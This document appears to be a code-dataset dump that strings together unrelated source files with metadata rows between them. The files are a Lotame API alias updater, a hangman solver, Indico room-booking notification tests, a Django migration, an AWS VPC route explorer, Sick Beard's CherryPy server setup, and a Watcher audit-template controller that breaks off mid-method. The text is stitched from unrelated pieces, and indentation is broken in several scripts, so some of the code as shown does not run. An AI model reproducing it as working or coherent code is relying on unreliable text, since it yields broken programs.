def analyze_input(self):
"""."""
return reduce((lambda x, y: x + y), list(map(self.analyze_room, self.input_list)))
if __name__ == "__main__":
puzzle_input = get_input()
    analyzer = RoomAnalyzer(puzzle_input)
print(analyzer.analyze_input())
| mit | 4,726,723,384,833,023,000 | 27.295455 | 110 | 0.578313 | false | 3.536932 | false | false | false |
Lotame/api-examples | py/update_behavior_aliases.py | 1 | 1702 | '''
Please note that this file is an example, not an official Lotame-supported
tool. The Support team at Lotame does not provide support for this script,
as it's only meant to serve as a guide to help you use the Services API.
Filename: update_behavior_aliases.py
Author: Brett Coker
Python Version: 3.6.3
Updated: 12/19/17
Adds new aliases to behaviors. Takes an .xlsx as an argument.
The spreadsheet should be formatted as follows:
- Header row required
- First column is behavior IDs
- Second column is aliases.
'''
import sys
import openpyxl
import better_lotameapi
def main():
if len(sys.argv) == 1:
print(f'Usage: python {sys.argv[0]} aliases.xlsx')
return
lotame = better_lotameapi.Lotame()
option = 0
while option not in ['1', '2']:
print('Select option:')
        print('1. Replace aliases')
        print('2. Append aliases')
option = input('Option: ')
filename = sys.argv[1]
workbook = openpyxl.load_workbook(filename)
sheet_names = workbook.get_sheet_names()
sheet = workbook.get_sheet_by_name(sheet_names[0])
for row in range(2, sheet.max_row + 1):
behavior_id = str(sheet[f'A{row}'].value)
new_alias = str(sheet[f'B{row}'].value)
endpoint = f'behaviors/{behavior_id}/aliases'
info = lotame.get(endpoint).json()
if option == '1': # Replace
info['alias'] = [new_alias]
else: # Append
info['alias'].append(new_alias)
status = lotame.put(endpoint, info).status_code
print(f'Behavior {behavior_id} | HTTP {status}')
if __name__ == '__main__':
main()
| mit | -7,778,892,717,763,026,000 | 27.366667 | 78 | 0.615159 | false | 3.621277 | false | false | false |
Mocha2007/mochalib | hangman_solver_nadeko.py | 1 | 1481 | from json import load
from re import match, search
from typing import Set
alphabet = 'abcdefghijklmnopqrstuvwxyz'
hangman_data = load(open('hangman.json', 'r'))
all_words = [[i['Word'] for i in word] for word in [category for category in hangman_data.values()]]
all_words = {j.lower() for i in all_words for j in i} # type: Set[str]
def solve_all(pattern: str, ignore_set: str = '') -> Set[str]:
re_alphabet = ''.join([letter for letter in alphabet if letter not in set(pattern)])
re_pattern = pattern.replace('_', '['+re_alphabet+']')
possible_words = set()
for word in all_words:
if ignore_set and search('['+ignore_set+']', word):
continue
if len(word) == len(pattern) and match(re_pattern, word):
possible_words.add(word)
print(possible_words)
return possible_words
def recommend_letter(word_set: Set[str], ignore_set: str = '') -> str:
"""Given a set of possible answers, return a guess to whittle down as many answers as possible."""
letter_histogram = {letter: abs(len(word_set)//2-sum(letter in word for word in word_set))
for letter in alphabet if letter not in ignore_set}
return sorted(letter_histogram.items(), key=lambda x: x[1])[0][0]
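# Example: solve_all('_a_e', 'rst') keeps every four-letter candidate that matches
# the pattern and contains none of r, s or t; recommend_letter() then returns the
# letter whose presence count is closest to half the remaining candidates, i.e.
# the guess that splits the candidate set most evenly.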
while 1:
status = input('>>> ')
try:
if ';' in status:
status, ignore = status.split(';')
else:
ignore = ''
solution_set = solve_all(status, ignore)
print(list(solution_set)[0] if len(solution_set) == 1 else recommend_letter(solution_set, ignore))
except Exception as e:
print(e)
| gpl-3.0 | 8,181,521,549,108,761,000 | 34.261905 | 100 | 0.681972 | false | 3.157783 | false | false | false |
OmeGak/indico | indico/modules/rb/tasks_test.py | 2 | 7957 | # This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from collections import defaultdict
from datetime import datetime
from itertools import chain
import dateutil.parser
from indico.modules.rb import rb_settings
from indico.modules.rb.models.reservations import RepeatFrequency
from indico.modules.rb.tasks import roombooking_end_notifications, roombooking_occurrences
pytest_plugins = 'indico.modules.rb.testing.fixtures'
settings = {
'notification_before_days': 2,
'notification_before_days_weekly': 5,
'notification_before_days_monthly': 7,
'end_notification_daily': 1,
'end_notification_weekly': 3,
'end_notification_monthly': 7
}
users = {
'x': {'first_name': 'Mister', 'last_name': 'Evil'},
'y': {'first_name': 'Doctor', 'last_name': 'No'}
}
rooms = {
'a': {
'notification_before_days': None,
'notification_before_days_weekly': None,
'notification_before_days_monthly': None,
'end_notification_daily': None,
'end_notification_weekly': None,
'end_notification_monthly': None
},
'b': {
'notification_before_days': 10,
'notification_before_days_weekly': 11,
'notification_before_days_monthly': 12,
'end_notification_daily': 2,
'end_notification_weekly': 4,
'end_notification_monthly': 8
}
}
reservations = [
{
'start_dt': '2017-03-31 15:00',
'end_dt': '2017-04-10 16:00',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'notification': '2017-04-03',
},
{
'start_dt': '2017-04-03 12:00',
'end_dt': '2017-04-03 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'a',
'user': 'x',
'notification': '2017-04-03',
},
{
'start_dt': '2017-03-30 12:00',
'end_dt': '2017-05-04 14:00',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'a',
'user': 'x',
'notification': '2017-04-06',
},
{
'start_dt': '2017-04-08 12:00',
'end_dt': '2017-05-13 14:00',
'repeat_frequency': RepeatFrequency.MONTH,
'room': 'a',
'user': 'y',
'notification': '2017-04-08',
},
{
'start_dt': '2017-04-11 12:00',
'end_dt': '2017-04-11 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'notification': '2017-04-11', # today + 10
},
{
'start_dt': '2017-04-03 12:00',
'end_dt': '2017-04-03 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'notification': None, # room has today+10 not today+1
},
]
finishing_reservations = [
{
'start_dt': '2019-07-08 12:00',
'end_dt': '2019-07-08 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 14:00',
'end_dt': '2019-07-07 14:30',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'a',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 14:30',
'end_dt': '2019-07-09 15:00',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'end_notification': True
},
{
'start_dt': '2019-07-07 15:00',
'end_dt': '2019-07-10 15:10',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 15:10',
'end_dt': '2019-07-10 15:20',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-07 15:20',
'end_dt': '2019-07-11 15:30',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'b',
'user': 'y',
'end_notification': False
},
{
'start_dt': '2019-07-05 15:30',
'end_dt': '2019-07-12 15:40',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-05 15:40',
'end_dt': '2019-07-15 15:50',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-05 15:50',
'end_dt': '2019-07-19 16:00',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': False
},
{
'start_dt': '2019-07-04 16:00',
'end_dt': '2019-07-11 16:10',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'a',
'user': 'x',
'end_notification': True
}
]
def test_roombooking_notifications(mocker, create_user, create_room, create_reservation, freeze_time):
rb_settings.set_multi(settings)
user_map = {key: create_user(id_, **data) for id_, (key, data) in enumerate(users.iteritems(), 1)}
room_map = {key: create_room(**data) for key, data in rooms.iteritems()}
notification_map = defaultdict(dict)
end_notification_map = defaultdict(dict)
for data in chain(reservations, finishing_reservations):
data['start_dt'] = dateutil.parser.parse(data['start_dt'])
data['end_dt'] = dateutil.parser.parse(data['end_dt'])
data['booked_for_user'] = user = user_map[data.pop('user')]
data['room'] = room_map[data['room']]
notification = data.pop('notification', None)
end_notification = data.pop('end_notification', None)
reservation = create_reservation(**data)
if notification:
notification_map[user][reservation] = dateutil.parser.parse(notification).date()
if end_notification is not None:
end_notification_map[user][reservation] = end_notification
notify_upcoming_occurrences = mocker.patch('indico.modules.rb.tasks.notify_upcoming_occurrences')
notify_about_finishing_bookings = mocker.patch('indico.modules.rb.tasks.notify_about_finishing_bookings')
freeze_time(datetime(2017, 4, 1, 8, 0, 0))
roombooking_occurrences()
for (user, occurrences), __ in notify_upcoming_occurrences.call_args_list:
notifications = notification_map.pop(user)
for occ in occurrences:
date = notifications.pop(occ.reservation)
assert occ.start_dt.date() == date
assert occ.notification_sent
past_occs = [x for x in occ.reservation.occurrences if x.start_dt.date() < date.today()]
future_occs = [x for x in occ.reservation.occurrences if x.start_dt.date() > date.today() and x != occ]
assert not any(x.notification_sent for x in past_occs)
if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
assert all(x.notification_sent for x in future_occs)
else:
assert not any(x.notification_sent for x in future_occs)
assert not notifications # no extra notifications
assert not notification_map # no extra users
freeze_time(datetime(2019, 7, 8, 8, 0, 0))
roombooking_end_notifications()
for (user, user_finishing_reservations), __ in notify_about_finishing_bookings.call_args_list:
end_notifications = end_notification_map.pop(user)
for reservation in user_finishing_reservations:
should_be_sent = end_notifications.pop(reservation)
assert reservation.end_notification_sent == should_be_sent
assert all(not r.end_notification_sent for r in end_notifications)
assert not end_notification_map
| mit | 5,526,023,487,916,892,000 | 32.57384 | 115 | 0.576851 | false | 3.390285 | false | false | false |
davivcgarcia/wttd-15 | eventex/core/migrations/0002_auto__add_talk.py | 1 | 2973 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Talk'
db.create_table(u'core_talk', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('start_time', self.gf('django.db.models.fields.TimeField')(blank=True)),
))
db.send_create_signal(u'core', ['Talk'])
# Adding M2M table for field speakers on 'Talk'
m2m_table_name = db.shorten_name(u'core_talk_speakers')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('talk', models.ForeignKey(orm[u'core.talk'], null=False)),
('speaker', models.ForeignKey(orm[u'core.speaker'], null=False))
))
db.create_unique(m2m_table_name, ['talk_id', 'speaker_id'])
def backwards(self, orm):
# Deleting model 'Talk'
db.delete_table(u'core_talk')
# Removing M2M table for field speakers on 'Talk'
db.delete_table(db.shorten_name(u'core_talk_speakers'))
models = {
u'core.contact': {
'Meta': {'object_name': 'Contact'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'speaker': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Speaker']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'core.speaker': {
'Meta': {'object_name': 'Speaker'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'core.talk': {
'Meta': {'object_name': 'Talk'},
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'speakers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Speaker']", 'symmetrical': 'False'}),
'start_time': ('django.db.models.fields.TimeField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['core'] | gpl-3.0 | 1,897,258,236,742,869,000 | 45.46875 | 136 | 0.562395 | false | 3.543504 | false | false | false |
daniellawrence/aws-map | explorer.py | 1 | 1721 | #!/usr/bin/env python
import boto.ec2
import boto.vpc
from local_settings import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
import pprint
def region_connect(region_name):
vpc_conn = boto.vpc.connect_to_region(region_name,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
ec2_conn = boto.ec2.connect_to_region(region_name,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
return vpc_conn
def get_all_routetables(vpc_conn, filters={}):
raw_route_tables = vpc_conn.get_all_route_tables(filters=filters)
for rt in raw_route_tables:
#pprint.pprint(rt.__dict__)
for a in rt.associations:
if not a.subnet_id:
continue
pprint.pprint(a.__dict__)
for r in rt.routes:
gateway = r.gateway_id
if r.instance_id:
gateway = r.instance_id
print "%-20s -> %s" % (r.destination_cidr_block, gateway)
print "=="
def get_all_subnets(vpc_conn, filters={}):
raw_subnet_list = vpc_conn.get_all_subnets()
for s in raw_subnet_list:
get_all_routetables(vpc_conn, filters={'vpc_id': s.vpc_id})
#get_all_internet_gateways(vpc_conn)
def get_all_internet_gateways(vpc_conn, filters={}):
raw_igw_list = vpc_conn.get_all_internet_gateways(filters=filters)
for igw in raw_igw_list:
print igw
def main():
"Main"
vpc_conn = region_connect('ap-southeast-2')
get_all_subnets(vpc_conn)
if __name__ == '__main__':
main()
| mit | -6,424,525,554,819,934,000 | 32.745098 | 85 | 0.574666 | false | 3.442 | false | false | false |
eptmp3/Sick-Beard | sickbeard/webserveInit.py | 43 | 6433 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
#import cherrypy
import cherrypy.lib.auth_basic
import os.path
import sickbeard
from sickbeard import logger
from sickbeard.webserve import WebInterface
from sickbeard.helpers import create_https_certificates
def initWebServer(options=None):
    # use None as the default to avoid sharing a mutable default dict between calls
    if options is None:
        options = {}
options.setdefault('port', 8081)
options.setdefault('host', '0.0.0.0')
options.setdefault('log_dir', None)
options.setdefault('username', '')
options.setdefault('password', '')
options.setdefault('web_root', '/')
assert isinstance(options['port'], int)
assert 'data_root' in options
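    # the options dict is expected to look roughly like this (values are
    # illustrative only):
    #   {'port': 8081, 'host': '0.0.0.0', 'data_root': '/path/to/gui/data',
    #    'web_root': '/', 'log_dir': None, 'username': '', 'password': '',
    #    'enable_https': False, 'https_cert': '', 'https_key': ''}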
    def http_error_401_handler(status, message, traceback, version):
""" Custom handler for 401 error """
if status != "401 Unauthorized":
logger.log(u"CherryPy caught an error: %s %s" % (status, message), logger.ERROR)
logger.log(traceback, logger.DEBUG)
return r'''
<html>
<head>
<title>%s</title>
</head>
<body>
<br/>
<font color="#0000FF">Error %s: You need to provide a valid username and password.</font>
</body>
</html>
''' % ('Access denied', status)
    def http_error_404_handler(status, message, traceback, version):
""" Custom handler for 404 error, redirect back to main page """
return r'''
<html>
<head>
<title>404</title>
<script type="text/javascript" charset="utf-8">
<!--
location.href = "%s"
//-->
</script>
</head>
<body>
<br/>
</body>
</html>
''' % '/'
# cherrypy setup
enable_https = options['enable_https']
https_cert = options['https_cert']
https_key = options['https_key']
if enable_https:
# If either the HTTPS certificate or key do not exist, make some self-signed ones.
if not (https_cert and os.path.exists(https_cert)) or not (https_key and os.path.exists(https_key)):
if not create_https_certificates(https_cert, https_key):
logger.log(u"Unable to create cert/key files, disabling HTTPS")
sickbeard.ENABLE_HTTPS = False
enable_https = False
if not (os.path.exists(https_cert) and os.path.exists(https_key)):
logger.log(u"Disabled HTTPS because of missing CERT and KEY files", logger.WARNING)
sickbeard.ENABLE_HTTPS = False
enable_https = False
options_dict = {
'server.socket_port': options['port'],
'server.socket_host': options['host'],
'log.screen': False,
        'error_page.401': http_error_401_handler,
        'error_page.404': http_error_404_handler,
}
if enable_https:
options_dict['server.ssl_certificate'] = https_cert
options_dict['server.ssl_private_key'] = https_key
protocol = "https"
else:
protocol = "http"
logger.log(u"Starting Sick Beard on "+protocol+"://" + str(options['host']) + ":" + str(options['port']) + "/")
cherrypy.config.update(options_dict)
# setup cherrypy logging
if options['log_dir'] and os.path.isdir(options['log_dir']):
cherrypy.config.update({ 'log.access_file': os.path.join(options['log_dir'], "cherrypy.log") })
logger.log('Using %s for cherrypy log' % cherrypy.config['log.access_file'])
conf = {
'/': {
'tools.staticdir.root': options['data_root'],
'tools.encode.on': True,
'tools.encode.encoding': 'utf-8',
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
}
app = cherrypy.tree.mount(WebInterface(), options['web_root'], conf)
# auth
if options['username'] != "" and options['password'] != "":
checkpassword = cherrypy.lib.auth_basic.checkpassword_dict({options['username']: options['password']})
app.merge({
'/': {
'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'SickBeard',
'tools.auth_basic.checkpassword': checkpassword
},
'/api':{
'tools.auth_basic.on': False
},
'/api/builder':{
'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'SickBeard',
'tools.auth_basic.checkpassword': checkpassword
}
})
cherrypy.server.start()
cherrypy.server.wait()
| gpl-3.0 | 3,527,258,859,284,974,600 | 38.459119 | 119 | 0.494948 | false | 4.436552 | false | false | false |
stackforge/watcher | watcher/api/controllers/v1/audit_template.py | 2 | 27944 | # -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An :ref:`Audit <audit_definition>` may be launched several times with the same
settings (:ref:`Goal <goal_definition>`, thresholds, ...). Therefore it makes
sense to save those settings in some sort of Audit preset object, which is
known as an :ref:`Audit Template <audit_template_definition>`.
An :ref:`Audit Template <audit_template_definition>` contains at least the
:ref:`Goal <goal_definition>` of the :ref:`Audit <audit_definition>`.
It may also contain some error handling settings indicating whether:
- :ref:`Watcher Applier <watcher_applier_definition>` stops the
entire operation
- :ref:`Watcher Applier <watcher_applier_definition>` performs a rollback
and how many retries should be attempted before failure occurs (also the latter
can be complex: for example the scenario in which there are many first-time
failures on ultimately successful :ref:`Actions <action_definition>`).
Moreover, an :ref:`Audit Template <audit_template_definition>` may contain some
settings related to the level of automation for the
:ref:`Action Plan <action_plan_definition>` that will be generated by the
:ref:`Audit <audit_definition>`.
A flag will indicate whether the :ref:`Action Plan <action_plan_definition>`
will be launched automatically or will need a manual confirmation from the
:ref:`Administrator <administrator_definition>`.
"""
import datetime
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from watcher._i18n import _
from watcher.api.controllers import base
from watcher.api.controllers import link
from watcher.api.controllers.v1 import collection
from watcher.api.controllers.v1 import types
from watcher.api.controllers.v1 import utils as api_utils
from watcher.common import context as context_utils
from watcher.common import exception
from watcher.common import policy
from watcher.common import utils as common_utils
from watcher.decision_engine.loading import default as default_loading
from watcher import objects
def hide_fields_in_newer_versions(obj):
"""This method hides fields that were added in newer API versions.
Certain node fields were introduced at certain API versions.
These fields are only made available when the request's API version
matches or exceeds the versions when these fields were introduced.
"""
pass
class AuditTemplatePostType(wtypes.Base):
_ctx = context_utils.make_context()
name = wtypes.wsattr(wtypes.text, mandatory=True)
"""Name of this audit template"""
description = wtypes.wsattr(wtypes.text, mandatory=False)
"""Short description of this audit template"""
goal = wtypes.wsattr(wtypes.text, mandatory=True)
"""Goal UUID or name of the audit template"""
strategy = wtypes.wsattr(wtypes.text, mandatory=False)
"""Strategy UUID or name of the audit template"""
scope = wtypes.wsattr(types.jsontype, mandatory=False, default=[])
"""Audit Scope"""
def as_audit_template(self):
return AuditTemplate(
name=self.name,
description=self.description,
goal_id=self.goal, # Dirty trick ...
goal=self.goal,
strategy_id=self.strategy, # Dirty trick ...
strategy_uuid=self.strategy,
scope=self.scope,
)
@staticmethod
def _build_schema():
SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "array",
"items": {
"type": "object",
"properties": AuditTemplatePostType._get_schemas(),
"additionalProperties": False
}
}
return SCHEMA
@staticmethod
def _get_schemas():
collectors = default_loading.ClusterDataModelCollectorLoader(
).list_available()
schemas = {k: c.SCHEMA for k, c
in collectors.items() if hasattr(c, "SCHEMA")}
return schemas
@staticmethod
def validate(audit_template):
available_goals = objects.Goal.list(AuditTemplatePostType._ctx)
available_goal_uuids_map = {g.uuid: g for g in available_goals}
available_goal_names_map = {g.name: g for g in available_goals}
if audit_template.goal in available_goal_uuids_map:
goal = available_goal_uuids_map[audit_template.goal]
elif audit_template.goal in available_goal_names_map:
goal = available_goal_names_map[audit_template.goal]
else:
raise exception.InvalidGoal(goal=audit_template.goal)
if audit_template.scope:
keys = [list(s)[0] for s in audit_template.scope]
if keys[0] not in ('compute', 'storage'):
audit_template.scope = [dict(compute=audit_template.scope)]
common_utils.Draft4Validator(
AuditTemplatePostType._build_schema()
).validate(audit_template.scope)
include_host_aggregates = False
exclude_host_aggregates = False
for rule in audit_template.scope[0]['compute']:
if 'host_aggregates' in rule:
include_host_aggregates = True
elif 'exclude' in rule:
for resource in rule['exclude']:
if 'host_aggregates' in resource:
exclude_host_aggregates = True
if include_host_aggregates and exclude_host_aggregates:
raise exception.Invalid(
message=_(
"host_aggregates can't be "
"included and excluded together"))
if audit_template.strategy:
try:
if (common_utils.is_uuid_like(audit_template.strategy) or
common_utils.is_int_like(audit_template.strategy)):
strategy = objects.Strategy.get(
AuditTemplatePostType._ctx, audit_template.strategy)
else:
strategy = objects.Strategy.get_by_name(
AuditTemplatePostType._ctx, audit_template.strategy)
except Exception:
raise exception.InvalidStrategy(
strategy=audit_template.strategy)
# Check that the strategy we indicate is actually related to the
# specified goal
if strategy.goal_id != goal.id:
available_strategies = objects.Strategy.list(
AuditTemplatePostType._ctx)
choices = ["'%s' (%s)" % (s.uuid, s.name)
for s in available_strategies]
raise exception.InvalidStrategy(
message=_(
"'%(strategy)s' strategy does relate to the "
"'%(goal)s' goal. Possible choices: %(choices)s")
% dict(strategy=strategy.name, goal=goal.name,
choices=", ".join(choices)))
audit_template.strategy = strategy.uuid
# We force the UUID so that we do not need to query the DB with the
# name afterwards
audit_template.goal = goal.uuid
return audit_template
class AuditTemplatePatchType(types.JsonPatchType):
_ctx = context_utils.make_context()
@staticmethod
def mandatory_attrs():
return []
@staticmethod
def validate(patch):
if patch.path == "/goal" and patch.op != "remove":
AuditTemplatePatchType._validate_goal(patch)
elif patch.path == "/goal" and patch.op == "remove":
raise exception.OperationNotPermitted(
_("Cannot remove 'goal' attribute "
"from an audit template"))
if patch.path == "/strategy":
AuditTemplatePatchType._validate_strategy(patch)
return types.JsonPatchType.validate(patch)
@staticmethod
def _validate_goal(patch):
patch.path = "/goal_id"
goal = patch.value
if goal:
available_goals = objects.Goal.list(
AuditTemplatePatchType._ctx)
available_goal_uuids_map = {g.uuid: g for g in available_goals}
available_goal_names_map = {g.name: g for g in available_goals}
if goal in available_goal_uuids_map:
patch.value = available_goal_uuids_map[goal].id
elif goal in available_goal_names_map:
patch.value = available_goal_names_map[goal].id
else:
raise exception.InvalidGoal(goal=goal)
@staticmethod
def _validate_strategy(patch):
patch.path = "/strategy_id"
strategy = patch.value
if strategy:
available_strategies = objects.Strategy.list(
AuditTemplatePatchType._ctx)
available_strategy_uuids_map = {
s.uuid: s for s in available_strategies}
available_strategy_names_map = {
s.name: s for s in available_strategies}
if strategy in available_strategy_uuids_map:
patch.value = available_strategy_uuids_map[strategy].id
elif strategy in available_strategy_names_map:
patch.value = available_strategy_names_map[strategy].id
else:
raise exception.InvalidStrategy(strategy=strategy)
class AuditTemplate(base.APIBase):
"""API representation of a audit template.
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
audit template.
"""
_goal_uuid = None
_goal_name = None
_strategy_uuid = None
_strategy_name = None
def _get_goal(self, value):
if value == wtypes.Unset:
return None
goal = None
try:
if (common_utils.is_uuid_like(value) or
common_utils.is_int_like(value)):
goal = objects.Goal.get(
pecan.request.context, value)
else:
goal = objects.Goal.get_by_name(
pecan.request.context, value)
except exception.GoalNotFound:
pass
if goal:
self.goal_id = goal.id
return goal
def _get_strategy(self, value):
if value == wtypes.Unset:
return None
strategy = None
try:
if (common_utils.is_uuid_like(value) or
common_utils.is_int_like(value)):
strategy = objects.Strategy.get(
pecan.request.context, value)
else:
strategy = objects.Strategy.get_by_name(
pecan.request.context, value)
except exception.StrategyNotFound:
pass
if strategy:
self.strategy_id = strategy.id
return strategy
def _get_goal_uuid(self):
return self._goal_uuid
def _set_goal_uuid(self, value):
if value and self._goal_uuid != value:
self._goal_uuid = None
goal = self._get_goal(value)
if goal:
self._goal_uuid = goal.uuid
def _get_strategy_uuid(self):
return self._strategy_uuid
def _set_strategy_uuid(self, value):
if value and self._strategy_uuid != value:
self._strategy_uuid = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_uuid = strategy.uuid
def _get_goal_name(self):
return self._goal_name
def _set_goal_name(self, value):
if value and self._goal_name != value:
self._goal_name = None
goal = self._get_goal(value)
if goal:
self._goal_name = goal.name
def _get_strategy_name(self):
return self._strategy_name
def _set_strategy_name(self, value):
if value and self._strategy_name != value:
self._strategy_name = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_name = strategy.name
uuid = wtypes.wsattr(types.uuid, readonly=True)
"""Unique UUID for this audit template"""
name = wtypes.text
"""Name of this audit template"""
description = wtypes.wsattr(wtypes.text, mandatory=False)
"""Short description of this audit template"""
goal_uuid = wtypes.wsproperty(
wtypes.text, _get_goal_uuid, _set_goal_uuid, mandatory=True)
"""Goal UUID the audit template refers to"""
goal_name = wtypes.wsproperty(
wtypes.text, _get_goal_name, _set_goal_name, mandatory=False)
"""The name of the goal this audit template refers to"""
strategy_uuid = wtypes.wsproperty(
wtypes.text, _get_strategy_uuid, _set_strategy_uuid, mandatory=False)
"""Strategy UUID the audit template refers to"""
strategy_name = wtypes.wsproperty(
wtypes.text, _get_strategy_name, _set_strategy_name, mandatory=False)
"""The name of the strategy this audit template refers to"""
audits = wtypes.wsattr([link.Link], readonly=True)
"""Links to the collection of audits contained in this audit template"""
links = wtypes.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated audit template links"""
scope = wtypes.wsattr(types.jsontype, mandatory=False)
"""Audit Scope"""
def __init__(self, **kwargs):
super(AuditTemplate, self).__init__()
self.fields = []
fields = list(objects.AuditTemplate.fields)
for k in fields:
# Skip fields we do not expose.
if not hasattr(self, k):
continue
self.fields.append(k)
setattr(self, k, kwargs.get(k, wtypes.Unset))
self.fields.append('goal_id')
self.fields.append('strategy_id')
setattr(self, 'strategy_id', kwargs.get('strategy_id', wtypes.Unset))
# goal_uuid & strategy_uuid are not part of
# objects.AuditTemplate.fields because they're API-only attributes.
self.fields.append('goal_uuid')
self.fields.append('goal_name')
self.fields.append('strategy_uuid')
self.fields.append('strategy_name')
setattr(self, 'goal_uuid', kwargs.get('goal_id', wtypes.Unset))
setattr(self, 'goal_name', kwargs.get('goal_id', wtypes.Unset))
setattr(self, 'strategy_uuid',
kwargs.get('strategy_id', wtypes.Unset))
setattr(self, 'strategy_name',
kwargs.get('strategy_id', wtypes.Unset))
@staticmethod
def _convert_with_links(audit_template, url, expand=True):
if not expand:
audit_template.unset_fields_except(
['uuid', 'name', 'goal_uuid', 'goal_name',
'scope', 'strategy_uuid', 'strategy_name'])
# The numeric ID should not be exposed to
# the user, it's internal only.
audit_template.goal_id = wtypes.Unset
audit_template.strategy_id = wtypes.Unset
audit_template.links = [link.Link.make_link('self', url,
'audit_templates',
audit_template.uuid),
link.Link.make_link('bookmark', url,
'audit_templates',
audit_template.uuid,
bookmark=True)]
return audit_template
@classmethod
def convert_with_links(cls, rpc_audit_template, expand=True):
audit_template = AuditTemplate(**rpc_audit_template.as_dict())
hide_fields_in_newer_versions(audit_template)
return cls._convert_with_links(audit_template, pecan.request.host_url,
expand)
@classmethod
def sample(cls, expand=True):
sample = cls(uuid='27e3153e-d5bf-4b7e-b517-fb518e17f34c',
name='My Audit Template',
description='Description of my audit template',
goal_uuid='83e44733-b640-40e2-8d8a-7dd3be7134e6',
strategy_uuid='367d826e-b6a4-4b70-bc44-c3f6fe1c9986',
created_at=datetime.datetime.utcnow(),
deleted_at=None,
updated_at=datetime.datetime.utcnow(),
scope=[],)
return cls._convert_with_links(sample, 'http://localhost:9322', expand)
class AuditTemplateCollection(collection.Collection):
"""API representation of a collection of audit templates."""
audit_templates = [AuditTemplate]
"""A list containing audit templates objects"""
def __init__(self, **kwargs):
super(AuditTemplateCollection, self).__init__()
self._type = 'audit_templates'
@staticmethod
def convert_with_links(rpc_audit_templates, limit, url=None, expand=False,
**kwargs):
